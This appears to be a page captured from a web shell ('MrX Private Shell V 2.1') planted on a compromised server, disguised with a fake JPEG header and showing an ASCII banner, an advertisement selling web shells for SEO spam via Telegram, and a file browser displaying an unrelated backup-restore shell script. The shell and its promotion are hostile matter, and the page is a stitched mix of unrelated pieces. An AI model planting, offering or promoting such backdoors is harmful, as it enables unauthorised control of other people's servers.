����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# restore with PPDM
for asset in "${!PPDM_ASSETS_AND_SSIDS[@]}"; do
ssid=${PPDM_ASSETS_AND_SSIDS[$asset]}
LogPrint "Starting restore of $asset"
ddfsrc -r "/mnt/local/$asset" -S $ssid -i y \
-h DFA_SI_DD_HOST=$PPDM_DD_IP \
-h DFA_SI_DD_USER=$PPDM_DD_USERNAME \
-h DFA_SI_DEVICE_PATH=$PPDM_STORAGE_UNIT 1>&7 2>&8 ||
Error "Failed to restore $asset"
unset ssid
LogPrint "Finished restoring $asset"
done
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_restore_with_ppdm.sh | File | 454 B | 0644 |
|